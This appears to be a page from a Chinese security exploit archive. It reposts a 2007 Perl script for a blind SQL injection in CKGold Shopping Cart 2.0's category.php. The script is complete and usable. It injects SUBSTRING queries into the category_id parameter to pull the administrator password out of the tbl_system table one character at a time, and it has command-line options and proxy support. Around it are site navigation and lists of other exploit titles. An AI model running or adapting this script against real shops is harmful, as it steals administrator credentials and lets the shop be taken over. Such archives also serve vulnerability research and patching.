首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 CKGold Shopping Cart 2.0 (category.php) Blind SQL Injection Exploit 来源：newhack[dot]org 作者：k1tk4t 发布时间：2007-09-03   #!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[4]) { print "\n  |-------------------------------------------------|"; print "\n  |                newhack[dot]org                  |"; print "\n  |-------------------------------------------------|"; print "\n  |  CKGold Shopping Cart v2.0 Blind SQL Injection  |"; print "\n  |          Found by k1tk4t - Indonesia            |"; print "\n  |   DNX Code  dnx[at]hackermail.com | Modified    |"; print "\n  |-------------------------------------------------|"; print "\n[!] Vendor: http://www.cartkeeper.com"; print "\n[!] Usage: perl CKGold.pl [Host] [Path] <Options>"; print "\n[!] Example: perl CKGold.pl 127.0.0.1 /shop/ -m 1 -c 10 -t tbl_system"; print "\n[!] Options:"; print "\n       -m [no]       Valid manufacturer_id"; print "\n       -c [no]       Valid category_id"; print "\n       -t [name]     Changes the system table name, default is tbl_system"; print "\n       -p [ip:port]  Proxy support"; print "\n"; exit; } my $host    = $ARGV[0]; my $path    = $ARGV[1]; my $mfr     = $ARGV[2]; my $cat     = $ARGV[3]; my $table   = "tbl_system"; my %options = (); GetOptions(\%options, "m=i", "c=i", "t=s", "p=s"); print "[!] Exploiting...\n"; if($options{"m"}) { $mfr = $options{"m"}; } if($options{"c"}) { $cat = $options{"c"}; } if($options{"t"}) { $table = $options{"t"}; } syswrite(STDOUT, "[!] Admin Password : ", 21); for(my $i = 1; $i <= 32; $i++) { my $found = 0; my $h = 48; while(!$found && $h <= 57) {    if(istrue2($host, $path, $table, $i, $h))    {      $found = 1;      syswrite(STDOUT, chr($h), 1);    }    $h++; } if(!$found) {    $h = 97;    while(!$found && $h <= 122)    {      if(istrue2($host, $path, $table, $i, $h))      {        $found = 1;        syswrite(STDOUT, chr($h), 1);      }      $h++;    } } } print "\n[!] Exploit done\n"; sub istrue2 { my $host  = shift; my $path  = shift; my $table = shift; my $i     = shift; my $h     = shift; my $ua = LWP::UserAgent->new; my $url = "http://".$host.$path."category.php?manufacturer_id=".$mfr."&category_id=".$cat."%20AND%20SUBSTRING((SELECT%20admin_password%20FROM%20".$table."%20LIMIT%200,1),".$i.",1)=CHAR(".$h.")"; if($options{"p"}) {    $ua->proxy('http', "http://".$options{"p"}); } my $response = $ua->get($url); my $content = $response->content; my $regexp = "<th>Products</th>"; if($content =~ /$regexp/) {    return 1; } else {    return 0; } }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·PPStream (PowerPlayer.dll 2.0. ·Joomla! 1.5 Beta1/Beta2/RC1 Re ·Wireshark < 0.99.5 DNP3 Dissec ·Yahoo! Messenger (YVerInfo.dll ·phpBB Links MOD 1.2.2 Remote S ·OTSTurntables 1.00 (m3u File) ·Norman Virus Control nvcoaft51 ·Apple Quicktime < 7.2 SMIL Rem ·Hexamail Server 3.0.0.001 (pop ·CCProxy <= v6.2 Telnet Proxy P ·Pakupaku CMS <= 0.4 Remote Fil ·Microsoft Visual Basic 6.0 VBP   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved